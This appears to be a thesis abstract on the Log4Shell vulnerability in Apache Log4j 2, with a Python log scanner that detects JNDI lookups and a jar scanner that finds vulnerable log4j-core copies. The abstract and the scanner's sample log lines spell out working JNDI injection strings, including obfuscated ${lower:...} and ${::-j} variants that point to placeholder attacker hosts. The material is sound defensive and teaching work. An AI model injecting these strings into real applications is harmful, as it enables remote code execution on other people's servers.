Apache Log4j Logging Framework and its Vulnerability
Agarwal, Yash (2022)
All rights reserved. This publication is copyrighted. You may download, display and print it for Your own personal use. Commercial use is prohibited.
The permanent address of this publication is
https://urn.fi/URN:NBN:fi:amk-202303063124
Abstract
Apache Log4j (Log4j) is a logging framework for Java, developed by the Apache Software Foundation and widely used to record the activity of web servers and other Java applications. Log4j 2 supports lookups, placeholders of the form ${...} that are expanded when a message is logged. One of these is the JNDI lookup, built on the Java Naming and Directory Interface API, which resolves a name through a naming or directory service. Through JNDI a Java application can query an LDAP (Lightweight Directory Access Protocol) server to locate services and objects shared by the applications running on a platform, so that they can share resources and communicate with each other instead of each deploying the same services again.
The vulnerability lies in this lookup. If attacker-controlled input reaches a log message, a string such as ${jndi:ldap://attacker-host/object} is expanded by Log4j, which asks the JNDI API to query the attacker's LDAP server. The server's reply can reference a remote Java class, and loading it runs the attacker's code on the platform: reading logs, querying services, or performing other malicious actions. The result is remote code execution (RCE) triggered by nothing more than a crafted string. Many services and web servers running Java or Java applications were affected, including products from Microsoft, Oracle and Google.
The aim of this thesis is to discuss the Log4j vulnerability (CVE-2021-44228, "Log4Shell") present in Log4j 2 releases 2.0-beta9 through 2.14.1. A sample attack on a simple Minecraft server is also demonstrated to emulate how the vulnerability works in a real-life scenario.
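The substitution described above is also what a defender looks for in logs. The following Python script is an added example, not code from the thesis: it collapses the nested lookups attackers use to disguise the word jndi (${lower:...}, ${upper:...} and the ${key:-default} fallback) the way Log4j's own substitutor would, then reports every line that ends up containing a ${jndi:...} lookup. The log lines, addresses and player names are constructed for the example and point at documentation-range addresses.

```python
import re

# Innermost ${...} expression: its body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and its URL scheme, matched against the normalized line.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(expr):
    """Evaluate one innermost lookup the way Log4j's substitutor would, for the
    lookups attackers use to hide the word 'jndi'. Returns None when the
    expression must be kept as-is (including the jndi lookup itself)."""
    head = expr.lower()
    if head.startswith("jndi:"):
        return None
    if head.startswith("lower:"):
        return expr[len("lower:"):].lower()
    if head.startswith("upper:"):
        return expr[len("upper:"):].upper()
    if ":-" in expr:
        # ${key:-default}: an unknown key such as ${env:NOPE:-j} or ${::-j}
        # falls back to the text after ':-'.
        return expr.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=32):
    """Collapse innermost lookups repeatedly until nothing changes."""
    def substitute(m):
        value = _resolve(m.group(1))
        return m.group(0) if value is None else value

    for _ in range(max_rounds):
        new = _INNER.sub(substitute, text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (1-based line number, URL scheme, normalized line) for every
    line that carries a ${jndi:...} lookup after normalization."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append((number, m.group(1).lower(), norm))
    return hits


# Constructed sample: two web-server access-log lines and three Minecraft
# server chat lines (chat is logged, which is how the thesis's demo delivers
# the payload). Line 4 spells "jndi" entirely through default-value fallbacks.
SAMPLE_LOGS = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '[12:00:03] [Server thread/INFO]: <player1> hello ${${lower:j}ndi:${lower:l}dap://198.51.100.5:1389/a}',
    '[12:00:04] [Server thread/INFO]: <player2> ${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-rmi}://198.51.100.5:1099/x}',
    '[12:00:05] [Server thread/INFO]: <player3> price is ${10} today',
]

if __name__ == "__main__":
    for number, scheme, norm in scan(SAMPLE_LOGS):
        print(f"line {number}: jndi:{scheme} lookup -> {norm}")
```

Only the lower, upper and default-value lookups are modelled here; Log4j has further lookups (date, sys, main, and others) that have also been used to hide the string, so a production rule should normalize those too or match on the structure of the nested ${...} itself rather than on the literal text.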
It was important to shed light on this vulnerability because of its harmful nature: it can be triggered remotely by anyone able to get a string into a log message, and it yields remote code execution (RCE). A CVSS (Common Vulnerability Scoring System) analysis of the vulnerability was also performed to gain more insight into its severity.
Fixes and workarounds are also discussed, since at the time of writing many deployments had not yet been upgraded to a fixed release. Log4j vulnerability scanning was also performed on the author's own devices (Windows and Linux) to check for applications affected by this vulnerability.
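One way to perform the kind of scan mentioned above, written as an added Python example rather than the tool the author used: it walks a directory tree, opens every .jar/.war/.ear archive (and archives nested inside them, such as a .jar under WEB-INF/lib of a .war), and reports archives that contain log4j-core's JndiLookup.class together with the version recorded in the bundled pom.properties. A copy is flagged as vulnerable when JndiLookup.class is present and the version is below 2.15.0, the first release that stops expanding lookups in log messages by default; a copy with the class deleted (a common workaround) is reported but not flagged. The sample archives the script builds in a temporary directory are constructed for the example and contain placeholder bytes rather than real class files.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_IN = (2, 15, 0)  # first release that no longer expands lookups in log messages by default
ARCHIVE_SUFFIXES = {".jar", ".war", ".ear", ".zip"}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def inspect_archive(zf, label, findings, depth=0):
    """Record log4j-core evidence in an open ZipFile, then recurse into nested archives."""
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1])
    has_lookup = JNDI_LOOKUP_CLASS in names
    if has_lookup or version is not None:
        findings.append({
            "archive": label,
            "version": version,
            "jndi_lookup_present": has_lookup,
            # Class present but version unknown is treated as vulnerable (conservative).
            "vulnerable": has_lookup and (version is None or version < FIXED_IN),
        })
    if depth < 2:  # e.g. app.war -> WEB-INF/lib/log4j-core.jar
        for member in sorted(names):
            if Path(member).suffix in ARCHIVE_SUFFIXES:
                try:
                    inner = zipfile.ZipFile(io.BytesIO(zf.read(member)))
                except zipfile.BadZipFile:
                    continue
                inspect_archive(inner, f"{label}!{member}", findings, depth + 1)


def scan_directory(root):
    """Scan every archive below root; labels are paths relative to root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, path.relative_to(root).as_posix(), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_tree(root):
    """Constructed fixtures: placeholder bytes stand in for the real class file."""
    root = Path(root)

    def write_jar(target, version, with_lookup):
        with zipfile.ZipFile(target, "w") as z:
            z.writestr(POM_PROPERTIES, f"version={version}\n")
            if with_lookup:
                z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")

    write_jar(root / "log4j-core-2.14.1.jar", "2.14.1", True)
    write_jar(root / "log4j-core-2.17.1.jar", "2.17.1", True)
    write_jar(root / "stripped-2.14.1.jar", "2.14.1", False)  # class removed as a workaround
    nested = io.BytesIO()
    write_jar(nested, "2.14.1", True)
    with zipfile.ZipFile(root / "app.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", nested.getvalue())


def demo():
    """Build the sample tree in a temporary directory and return {archive: vulnerable}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {f["archive"]: f["vulnerable"] for f in scan_directory(tmp)}


if __name__ == "__main__":
    for archive, vulnerable in sorted(demo().items()):
        print(("VULNERABLE  " if vulnerable else "ok          ") + archive)
```

To scan a real system, call scan_directory() on the application and server roots (and on any directory where fat jars are unpacked at run time); a scan of only top-level jars misses the nested copies that this example deliberately includes. Matching the version string and the presence of the class is a quick triage; a fuller scan also hashes the class file, since vendors ship renamed or repackaged copies of log4j-core without pom.properties.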